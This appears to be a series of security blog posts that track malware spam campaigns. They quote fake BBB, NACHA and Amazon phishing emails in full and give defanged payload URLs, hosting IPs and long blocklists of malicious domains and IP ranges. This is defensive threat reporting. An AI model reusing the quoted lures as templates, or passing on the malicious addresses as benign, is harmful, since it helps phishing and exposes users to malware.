Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©

Thu, 6 March 2013

Your Accreditation Suspended

[redacted]

The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to transient Cancell your accreditation with Better Business Beaureau. The details of the our decision are available visiting a link below. Please pay attention to this question and notify us about your belief as soon as possible.

We graciously ask you to visit the ABUSE REPORT to answer on this appeal

We awaits to your prompt answer.

If you think you got this email by mistake - please forward this message to your principal or accountant

Faithfully yours
Benjamin Cox
Dispute Councilor
Better Business Bureau

Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 24401
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277

This letter was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe



One potentially malicious payload is at [donotclick]alteshotel.net/detects/review_complain.php (looks like it might be broken - report here) hosted on:

69.43.161.176 (Parked at Castle Access Inc, US)

The other is at [donotclick]bbb-accredited.net/kill/enjoy-laws-partially-unwanted.php (definitely malicious - report here) hosted on:

64.207.236.198 (EasyTEL, US)
142.11.195.204 (Hostwinds LLC, US)
149.154.68.214 (TheFirst.RU, Russia)

These other domains can be seen on those IPs:
secureaction120.com
secureaction150.com
iberiti.com
notsk.com
metalcrew.net
roadix.net
gatovskiedelishki.ru
conbicormiks.ru

Recommended blocklist:
64.207.236.198
142.11.195.204
149.154.68.214
secureaction120.com
secureaction150.com
iberiti.com
notsk.com
metalcrew.net
roadix.net
gatovskiedelishki.ru
conbicormiks.ru
alteshotel.net
bbb-accredited.net

Thursday, 14 February 2013

Something evil on 92.63.105.23

Looks like a nasty infestion of Blackhole is lurking on 92.63.105.23 (TheFirst-RU, Russia) - see an example of the nastiness here (this link is safe to click!). The following domains are present on this address, although there are probably more.

ueizqnm.changeip.name
fmmrlp.ddns.name
qhtqqtxqua.onmypc.org
jakrcr.changeip.org
slnpqel.lflinkup.org
ydrehhvgjz.ezua.com
hurocozr.onedumb.com
sspmrwli.jkub.com
gifqravi.dnsrd.com
uzdknpz.4dq.com
aotztod.almostmy.com
ttenmxqq.vizvaz.com
axyaqb.xxuz.com
ywtxkebtx.ns01.info
rmvpfdg.onmypc.info
zzxvxyi.mydad.info
iselktnfo.xxxy.info
fgzsnergle.compress.to
wjbluj.ns01.us
yxbbvktub.myfw.us
hxlxxaqntaxb.myfw.us
rqjghacecazb.myfw.us
oxegwgflld.myfw.us
hvdkdcgae.myfw.us
hhifsoine.myfw.us
nsnybecste.myfw.us
jebrglmzye.myfw.us
fowgvslqqvgf.myfw.us
mqqpwxjlf.myfw.us
hfkfeuqfvzf.myfw.us
ukwwwhkamh.myfw.us
tvodqreyyyh.myfw.us
aokeufvoci.myfw.us
ejyffxuookfi.myfw.us
qhbkyfehpbzi.myfw.us
idjgpnkmaj.myfw.us
sqqqrsnozlgj.myfw.us
kqpaxhumj.myfw.us
elfncrfubk.myfw.us
qeavazuugk.myfw.us
pbvmirnwk.myfw.us
miptvfzufwal.myfw.us
ookzctlfazdl.myfw.us
rjrzcrswqhl.myfw.us
hhzlhizlbil.myfw.us
lwztritpzuvl.myfw.us
erlsgwzbgwl.myfw.us
eslwbgkgyqhm.myfw.us
bkhrwvxblnm.myfw.us
ngcfuanjtm.myfw.us
orownhbgn.myfw.us
rwdpuifin.myfw.us
jjxhjygwcnln.myfw.us
azddoalylxsn.myfw.us
dfredwpcun.myfw.us
xglzbowlmuco.myfw.us
jtzxmudxtno.myfw.us
phibmvaqsap.myfw.us
tuobdghfp.myfw.us
ybzwfyvadq.myfw.us
gvbxwmicjvq.myfw.us
abtqgybicghr.myfw.us
hqzgrwmorws.myfw.us
kwjgjnmmcu.myfw.us
csllshncxdu.myfw.us
cbqlthvefhv.myfw.us
eivxprpbemv.myfw.us
yowbgyyykemw.myfw.us
jmmbspisw.myfw.us
aadhvxiftw.myfw.us
lswgpbvvkukx.myfw.us
zwzfvpxksyx.myfw.us
aggwgeskrby.myfw.us
jjfzmzfkoky.myfw.us
okctxkxny.myfw.us
jeyqstlybz.myfw.us
yxkgtyqmz.myfw.us
sqazmgapz.myfw.us
esuifzeipsz.myfw.us
pjkcyvzcyz.myfw.us
cejkopsbv.port25.biz
rawvgbygj.gr8name.biz
gyomtcnzc.dhcp.biz
efdghpug.sexxxy.biz

Tuesday, 20 November 2012

Malware sites to block 20/11/12

This huge pile of malware sites and IPs is connected with these malicious emails being distributed in the Netherlands. All the sites are interconnected through their black hat infrastructure and are eith er being used for malware distribution or some other evil activity:

5.39.8.105 (OVH, Ireland)
46.249.38.27 (Hotkey, Russia)
62.109.31.36 (TheFirst, Russia)
64.79.64.170 (XLHost, US)
78.46.198.143 (GPI Holding,US)
78.110.61.186 (Hosting Telesystems, Russia)
91.220.35.42 (Zamahost, Russia)
91.220.35.74 (Zamahost, Russia)
91.231.156.55 (Sevzapkanat-Unimars, Russia)
93.174.90.81 (Ecatel, Netherlands)
95.211.9.46 (Leaseweb, Netherlands)
95.211.9.55 (Leaseweb, Netherlands)
149.154.67.103 (TheFirst, Russia)
176.9.179.170 (Siteko, Russia)
178.63.226.203 (Avist, Russia)
178.63.247.189 (GPI Holding,US)
178.162.134.205 (AlfaInternet, Russia)
184.82.101.52 (HostNOC, US)
193.161.86.43 (Host-Telecom, Czech Republic)
194.62.233.19 (Stils-Grupp, Russia)
198.23.139.199 (Chicago VPS, US)
208.88.226.231 (WZ Communications, US)

If you want to block those Russian hosts more widely, perhaps use the following list:
46.249.38.0/24
62.109.28.0/22
64.79.64.170
78.46.198.136/29
78.110.61.186
91.220.35.0/24
91.231.156.0/24
93.174.90.81
95.211.9.46
95.211.9.55
149.154.66.0/23
176.9.179.128/26
178.63.226.192/26
178.63.247.128/26
178.162.134.192/26
184.82.101.52
193.161.86.43
194.62.233.0/24
198.23.139.199

Alternatively, this is a plain list of all the IPs and domains that I can identify in this cluster. There are a LOT of them, sorry..
5.39.8.105
46.249.38.27
62.109.31.36
64.79.64.170
78.46.198.143
78.110.61.186
91.220.35.42
91.220.35.74
91.231.156.55
93.174.90.81
95.211.9.46
95.211.9.55
149.154.67.103
176.9.179.170
178.63.226.203
178.63.247.189
178.162.134.205
184.82.101.52
193.161.86.43
194.62.233.19
198.23.139.199
208.88.226.231
3dsec.4pu.com
617.ddns.info
617c.ddns.info
623c.ddns.info
95ccc.com
aboutmailmerging.net
achieve8searcherscom.com
achieve8searcherscom.net
adventureslh.net
advert01.wwwapp-myups.net
advert02.wwwapp-myups.net
alhmzpxsdtj.net
almanaccategorycommercial.org
aloha.4mydomain.com
alwaysallowdream.net
amalgamagain.info
analogmodemtittering.info
angleheadlines.info
anonymizerbookstore.pro
anxdn.info
anytimetunnel.biz
aol.adswrapper.com
appenoughceleronbased.org
artclipsamet.com
artistsbannerlike.pro
askplus.com
atstreetside.info
augmxqkfile.info
austerecam.net
aybqlgximi.info
babeqapa.tk
backgroundpioneered.org
bad2gooddog.com
badgestargetshaped.info
bannedbarefoot.info
barrenislandbeads.com
basetavo.tk
bcwud.info
bender.ddns.info
berasta.org
beregans.com
bestlermecg.info
bestmakingbreadonline.com
bestsearch.info
big-tube.info
blackboardcomodos.info
blizzardcwopp.net
bmjxsqrs.info
bombastikso.org
bonesgargamel.info
bothbe.org
brieffaith.info
brokenearparent.info
brounsnastles.com
builderskating.net
burdeningyp.org
businezzz.com
camimia.asia
cannotkubrick.info
caseroutinely.net
cassettesbeauty.org
castlerockcare.com
castlerockholiday.com
cdn.milstone.org
cdn2.milstone.org
chalais.com
chasidydil.mobi
cjsmweubiwy.info
clientyestab.biz
clipsvuze.info
clusterconference.com
cocktailpipeline.org
collapsesorenson.info
collegesorcerer.org
coloradopinolo.com
companypinolo.com
compellingpartition.org
conandeliberately.pro
constructionverified.org
coolhottube.net
copyahnlabs.info
countess.com
coupledqiks.org
crystalsave.net
ctosmamas.org
cuttinggoghs.info
cyberlinkspaypass.info
daertnop.ftp1.biz
dandyapples.pro
daoakxuko.info
darvuha.info
ddntruc.info
ddred.ddns.info
decreasesnotable.net
deductedsweatinducing.org
degreeswiftly.pro
deluxearpeggiated.info
delvingchromakey.info
demandededitions.info
densepromissory.info
dependthreelicense.info
desktopbasedwolfish.net
devidugo.tk
dialinlengths.info
discoverleaving.net
districtagenda.net
diyoyowo.tk
dkpdistrib.com
dns5number.com
dnsnumber4.com
docktoolsthe.org
doggedapril.info
dpljrtcsvva.info
dqnmuraq.info
dqnoctx.info
dreamflaunt.pro
drillup.itemdb.com
dsmxxqyh.info
dwall.info
ebaymoat.pro
echurchstrategies.com
emgsiavpjrlx.info
enemiesfocuses.org
epbdkhoacl.info
ergonomicbegging.net
eservicetimesyncing.org
everevolvingredact.info
excellentinternetmoney.com
executiveshours.org
exkcrch.info
experiencegraphical.net
extchangeable.net
eyecolorreserve.pro
faqseer.ddns.info
fdknklmlmb.pro
fejyvrhd.info
ffiae.info
fgypodecxg.info
figuringdictating.net
findrevenue.net
fireddependence.net
firefoxslacker.pro
fix-lite.info
fix-online.info
fklnbiokjemiwovpe.pro
fkvwtviospticmvjbhkae.usa.cc
flapshrill.net
flyswatinterestingly.info
fortraff.ddns.info
fqxxifs.info
fredamm4.cu.cc
freesnonintegral.net
fresh.otzo.com
frwdlink.in
ftpfreame.ddns.info
gadogube.tk
gdzwqbg.info
geodeskilar.info
geossh.net
geotagspogoplugs.org
getdnscheck.info
getestore.org
gfnsdntgb.info
ghrptvjb.info
gipifequ.tk
google123.flu.cc
google-script.net
gospodin.co.uk
governingjerk.org
green-suntech.com
grewforks.info
gromdemn77bert.pro
gudangbrankas.com
gymybrbcmfe.info
handishades.com
heartedmessaging.info
hemptalk.net
hmdvebvs.info
holdingshitech.info
homescastlerock.com
hostingmir.net
hourlyfyis.info
hsskvmg.info
humanitiesinstitute.com
hwpwecgl.info
ibabkmm.info
iftttcore.info
igadgetcapable.net
igtoydlufrpq.info
ihamehq.info
imagereport470x80.net
img.businessboomerflorida.com
img.chappellroberts.biz
img.chappellroberts.com
img.growmycash.com
img.ksyc1039.com
img.ksyc1039.info
img.ksyc1039.org
img.mitchcota.com
img.powerisfun.com
img.thefriar.com
img2.theqrpros.com
indiesblinks.com
influxtechnologies.com
innertextbosher.com
instructedtabtastic.org
interpretondemand.pro
intervalviicompatible.info
invadeinsecure.org
invitationsdoand.pro
iogdbsxmtk.pro
ipoiuhipowuujhwrtvas.flu.cc
iqyzfevrf.info
itouchsilence.net
jackerdesktopstyle.info
janomeku.tk
jdkthinkfree.net
jeuae.info
jeyhjrif.info
jfbwzb.info
jltwphu.info
josaheb.tk
junkwifi.com
jywkymar.info
jzmpmdodijj.info
karudozu.tk
kcgysjg.info
kcqobilky.info
kdvltguzobyj.info
kdvxojwpyzna.info
keystransactions.com
keyxdgpi.info
khdnqjau.info
kidasivi.tk
kinkosfragile.pro
kiwkemw.info
kohvragbmen.info
kqjoxyoe.info
kxxmnafgjeg.info
lasttube.info
lawbureau.com
leakedla.net
leddate.net
lesnegra.info
lgiqe.info
lslouxjrp.info
lunivusu.tk
lycyybse.info
mafpsqen.info
mandyeffect.com
mcclam.com
mdacparticular.org
mechcomm.net
mekanuki.tk
menugibberish.net
microsoftformatnuts.com
mixmoney.info
mkbeun.info
mkvpcsgg.info
moejpizdeprivet.org
mofaxeq5.cu.cc
moneysold.net
moneysporchefancy.net
moviehong.net
mugalkzr.info
my-best-tube.net
mydnsmask.info
mygreentube.net
mynewtube.net
nameshistory.info
ndwlmifgtox.info
nerosuptodate.org
netbooksmcafees.org
netboosterbreathe.net
new-browser1.ru
newcomersocialmediaminded.info
ngjfwcex.info
nicschleck5.com
nioterlybwma.info
nocejose.tk
nofussdonuts.org
notchedidrive.info
nxybedq.info
obitalkcomemptied.pro
obstacledogcams.org
occupyrent.com
ojkuxrfnwd.net
onedreamnetwork.com
oozeeven.org
opelcbgy.info
opwaksumd.info
ottnejwtsyn.info
ouviqqiift.info
overseassouth.net
oyparncfzw.info
packsos.info
paintsg.net
paisdhcgwrjklasdrt.usa.cc
palmwellreceived.net
panelsadvise.net
paqruwzktc.info
passesdemocratic.net
pathnamemypogoplugcom.net
pazza-inter.com
pdvfywomxtl.net
pervasivefootage.org
php.telwire.net
pihbqmtyjlz.info
piwroicybwyvnatywqerf.flu.cc
pizadaivanonaprivet.org
pksfxserverclass.net
plancentrallaura.org
planesmeasuring.pro
playpiano.info
plusesquotes.info
poishealthcare.info
polarizebit.org
polneska.ipq.co
posduet.org
pqdefywsxova.org
pregnancytestpaper.com
privacyparentalintersections.pro
processedinserting.info
proddingappsumo.info
projectthermometerstyle.net
promotesmetasearch.net
pxanwmcqod.info
pzoibqzb.info
qchtvjpmyfo.info
qesigafu.tk
qkfrcptayzj.info
qomazime.tk
qonla.info
qoxeciw.tk
qpflbmakjwe.info
qqpyzahqpqw.info
quxozife.tk
qzeryra.info
racksschools.pro
radialinfested.net
ragoose.ipq.co
ratiofollows.pro
rbgyoxngr.info
rdparentalcontrol.net
recorderscaloriecounting.net
recordingbarcelonas.info
reflectshello.info
resemblesvisa.info
resultsreacts.pro
retweetstasteful.net
retzaser.com
rfktgh.info
rhymingtravelocity.info
rhythmsstuttering.net
rivzdktjw.info
romanticring.com
royalmojito.org
rpfstorage.org
ruralnoise.info
saavihaunting.net
salzgrrckpa.info
scan-domain.org
sdavey.com
secondarydatapad.info
seguhuqo.tk
selectivelylanguages.info
semlnqzn.info
senetef.tk
servicesinstitute.com
sexintheroom.net
sgmlscreensavers.biz
sharpeyedresizable.net
shava.sytes.net
shownheadphone.net
silentpentest.com
sivoyase.tk
sjdwugpxnb.info
slewhovering.net
soft-tube.net
solicitationattorney.com
songbookterrified.pro
sorryintellicookie.net
spaceyourfilesbig.chickenkiller.com
speedanymore.net
spousechaptersthe.net
ssbigpicture.net
sscnvcxkcsh.info
startinternetmarketing4u.com
stats-tracking.ibiz.cc
storyboardonlysplines.info
stped.dnset.com
streamlinespaging.org
substitutesjeani.net
suitautorun.in
sundayhammered.net
superfasthardcopy.net
svqzmfcapho.info
svrealestates.com
swqocit.info
syenial.com
syncreticorder.com
sytghikbl.info
szjzico.info
tatibeg.tk
tceeeuq.info
teleprompterenglish.net
tenscrub.net
tethertremendous.info
tewnrpvxbdjc.info
texturesbusinesslevel.in
tiesink.net
tiffanylplee.com
tiffciscos.biz
tiledblacks.biz
tllnerim.info
tnciayzr.info
tobackupmxp.info
totesynopsis.net
traaf.ddns.info
traf13.ddns.info
trafferss.ddns.info
trafficstock.net
translucentattractive.net
trendmicrosemulate.info
trento.ikwb.com
tropicrentals.com
truestrategic.biz
tubeltd.net
tuhabos.tk
turocigu.tk
txhyzguwbdia.info
u83s.info
u86s.info
u87s.info
ufifkfwsnml.info
uigazjmeb.info
uihvdjf.info
uiolehvrfb.info
ukhercules.org
ultimate-boobs.com
ultqpdnrxh.info
umtxsx.info
unbootablemassively.info
undpower.co.uk
uninstallationcassette.net
urbansoulentertainment.com
user1.ddns.info
user3.ddns.info
useruploadedhumorist.info
usuiu.info
uyund.info
vansalivate.org
vendendoaqui.com
vennwake.info
viewcastlerock.com
vkdlbfh.info
vlbxty.info
vodkkaredbuuull.chickenkiller.com
wallarticles.com
wallmountedsubprojects.info
webcheckfinalizing.net
webcoupons2.com
weednav.info
weehourbravia.net
whicheverwe.info
win8searcherscom.com
wittierhoning.org
wnpagain.info
wogepil.tk
wrapeyeopening.info
wsrqeyqq.info
wupikbtq.info
www.obitalkcomemptied.pro
wwwapp-myups.com
wyllruoeueo.info
xcomctrlb.pro
xesidijo.tk
xhikjbtr.info
xidthronpemf.info
xijigaf.tk
xltube.info
xnqamke.info
x-red-tube.net
xszrccmve.info
ybnbqgqe.info
ybpekhvp.info
ydsvkx.info
yevetoma.tk
yfbthpdivlc.net
ylhwygggiy.info
yndgh.info
your-best-tube.net
yournewtube.net
zenithoutdoors.com
ziallow1990.com
zonermtbf.net
zqdrtnkhzd.info
ztmyno.info
zuretiy.tk
zvhtkpsnmdy.info
zvoxzgdrza.info


Tuesday, 23 October 2012

NACHA spam / bwdlpjvehrka.ddns.info

This fake NACHA spam leads to malware on bwdlpjvehrka.ddns.info:

Date:      Tue, 23 Oct 2012 05:44:05 +0200
From:      "noreply@direct.nacha.org"
Subject:      Notification about the rejected Direct Deposit payment

Herewith we are informing you, that your most recent Direct Deposit via ACH transaction (#914555512836) was cancelled, due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::

Details

Please contact your financial institution to acquire the new version of the software.

Sincerely yours

ACH Network Rules Department
NACHA | The Electronic Payments Association

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
Phone: 703-561-1100 Fax: 703-787-0996
The malicious payload is at [donotclick]bwdlpjvehrka.ddns.info/links/calls_already_stopping.php hosted on 78.24.222.16 (TheFirst-RU, Russia). Blocking this IP address would be a good move.

Thursday, 27 September 2012

Amazon.com spam / ciafgnepbs.ddns.ms

This fake Amazon.com spam leads to malware on ciafgnepbs.ddns.ms:

From: Viola Chatman [mailto:parchesei642@foxvalley.net]
Sent: 27 September 2012 12:10
Subject: Your Amazon.com order of "Casio Men's PRW7035T-6CR Pathfinder Triple Sensor Tough Solar Digital Multi-Function Titanium Pathfinder Watch" has shipped!

Hello,

Shipping Confirmation
Order # 749-1221929-9346291

Your estimated delivery date is:
Friday, August 3 2012

Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.

Shipment Details

Casio Men's PRW7035T-6CR Pathfinder Triple Sensor Tough Solar Digital Multi-Function Titanium Pathfinder Watch $139.95
Item Subtotal: $139.95
Shipping & Handling: $0.00
Total Before Tax: $139.95
Shipment Total: $139.95
Paid by Visa: $139.95

You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.

Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.

We hope to see you again soon!
Amazon.com


The malicious payload is at [donotclick]ciafgnepbs.ddns.ms/links/claims_separate-learns_buy.php hosted on 62.109.23.82 (TheFirst-RU, Russia), the suspect domain ynrteqhsobjv.dnset.com  is also on the same server, blocking that IP address would protect against other malicious sites on the same server.

You might also want to consider blocking all ddns.ms and dnset.com domains, although this type of Dynamic DNS domain does have its uses, I personally believe that the dangers of mis-use outweigh the benefits.